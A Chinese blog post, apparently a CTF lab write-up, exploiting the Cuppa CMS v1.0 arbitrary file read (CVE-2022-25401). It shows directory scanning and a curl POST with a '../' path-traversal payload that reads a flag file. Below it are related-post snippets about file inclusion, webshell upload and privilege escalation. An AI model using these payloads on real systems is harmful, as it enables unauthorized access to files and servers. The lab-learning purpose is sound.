春秋CVE-2022-25401 Cuppa CMS v1.0 任意文件读

最新推荐文章于 2023-12-28 14:52:05 发布
最新推荐文章于 2023-12-28 14:52:05 发布
阅读量1.5k 收藏 2
点赞数 1
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xxx177/article/details/127855329
版权

注意得先drib一下路径,题目给的administrator/templates/default/html/windows/right.php路径是错的
drib完就知道了

dirb http://host/

然后就去搜他是哪个参数存在漏洞(就是直接找poc)

在right.php的53行中存在

$url = $_POST["url"];
if(strstr($url, "../") || strstr($url, "..\\")){
echo "Security attack!";
exit;

之后就直接curl请求一下就好了

在这里插入图片描述

curl -X POST "http://www.a.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"
一九七六五三
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cuppa CMS 访问控制错误漏洞(CVE-2022-25401)
千寻的博客
12-09 2254
Cuppa CMS v1.0 的administrator/templates/default/html/windows/right.php文件存在任意文件取漏洞
Cuppa CMS:Cuppa是一个项目开源项目,旨在提供一个适应性强的CMS-开源
04-26
Cuppa是一个项目开源项目,旨在为任何项目提供一种适应性CMS:没有CMS但需要实施的新闻或现有开发项目,而无需实现向CMS的迁移过程或任何类型的改编。
【Vulnhub靶机】w1r3s.v1.0.1-CuppaCMS
过期的秋刀鱼
12-03 899
nmap扫描获得21,22,80,3306端口先看匿名的ftp,然后数据库,Web网站进行80端口的目录爆破,发现CuppaCMS通过漏洞库和浏览器进行了文件包含漏洞利用解密shadow文件,解密了两个用户名,尝试登陆,登陆成功,发现有全部的sudo权限,提权成功最后22端口,原本没有抱多大希望,但是在最后也是成功爆破出密码。
春秋云境:CVE-2022-25401
一只爱吃橙子的羊
12-01 896
Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件取漏洞
CuppaCMS 本地文件包含漏洞(CVE-2022-34121)
weixin_68999845的博客
07-31 469
CuppaCMS v1.0版本存在安全漏洞,该漏洞/templates/default/html/windows/right.php 页面存在本地文件包含问题。”,且用$POST[‘url’],包含敏感文件“etc/passwd”或出现“../”,则收到该漏洞攻击。找到存在漏洞的uri:/templates/default/html/windows/right.php。通过/templates/default/html/windows/right.php 文件发现,此处的。·漏洞类型:本地文件包含漏洞。
春秋云境:CVE-2022-25401任意文件取漏洞)
m0_65712192的博客
04-22 1643
Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件取漏洞
CVE-2022-25401
龙狼刺的博客
06-23 375
Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件取漏洞。
云镜CVE-2022-25401复现
m0_46684679的博客
02-09 612
Cuppa CMS v1.0 任意文件取漏洞
CuppaCMS 文件上传(CVE-2020-26048)
最新发布
m0_65150886的博客
12-28 482
CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。->Archivos,添加允许上传的文件类型,允许php文件,并保存。3.点击Gestor De Archivos,上传php一句话木马。6.删除.htaccess,如此才能执行php文件。2.在Configuración。1.访问ip:port。4.抓包,修改文件内容。
搭建cms网站,以cuppa_cms为例
qq_43583125的博客
09-03 296
打开此路径C:\phpStudy\WWW\cuppa_cms\administrator\installation。2.在网页访问cuppa_cms,如果出现unknown database "xxx",那么需要添加一个数据库。发现没有,那就创建一个数据库,数据库名称自定义(你开心就好)3.打开phpstudy===>其他选项菜单===>cmd命令行。拖入后最前面写source,路径中的\多写一个\。4.输入mysql -uroot -proot。数据库中没有表,需要导入。此时就可以正常安装了。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
Microsoft Exchange CVE-2022-41040 & CVE-2022-41082 Nmap检测脚本
10-03
CVE-2022-41040 Microsoft Exchange Server权限提升漏洞 和 CVE-2022-41082 Microsoft Exchange Server 远程执行代码漏洞 Nmap漏洞检测脚本 使用发发: -- @usage -- nmap --script proxynotshell_checker.nse -p...
CVE-2022-22965 GUItools单个图形化利用工具
04-06
CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行。
春秋云境cuppa CMS任意文件CVE-2022-25401
qq_52923396的博客
09-07 156
访问url尝试进行弱口令登录,登录不成功。直接尝试访问right.php。利用curl命令获取flag。
ED01-CMS 代码问题漏洞(CVE-2022-28525)
千寻的博客
11-27 1063
ED01-CMS v20180505 存在任意文件上传漏洞
[春秋云镜]CVE-2020-26048
niubi707的博客
12-08 915
CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。
OSCP-Vulnhub靶机记录-Bravery-walkthrough
深入交流学习:webMsec
09-30 538
genevieve的页面就出来了(后来看其他人的wp,发现是挂载了nfs,找到登录另一个加密盘的明文密码,这也是一种办法)将靶机的etc/passwd 复制到kali,使用openssl,写入一个root用户。绝对路径还是不对,前面的脚本都没有爆破出目录,网页报错也没爆出来,这条路先放弃。再看前面的扫描结果,445和2049,smb和nfs服务。挂载anonymous,翻一下里面有什么。把上面的目录都翻了一遍,找到可利用信息。提示我们,用的是cuppaCMS。尝试拼接目录,页面不存在。
春秋CVE-2022-21661
09-04
很抱歉,我无法根据提供的引用内容回答您的问题。引用内容中提到了春秋云境的CVE漏洞和靶场,但没有提及CVE-2022-21661。请提供更多与您的问题相关的信息,我将尽力提供帮助。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP](https://blog.csdn.net/weixin_46029520/article/details/128231197)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2022-21661 WordPress 5.8.2 SQL注入批量脚本](https://blog.csdn.net/suporsuluo/article/details/122566132)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值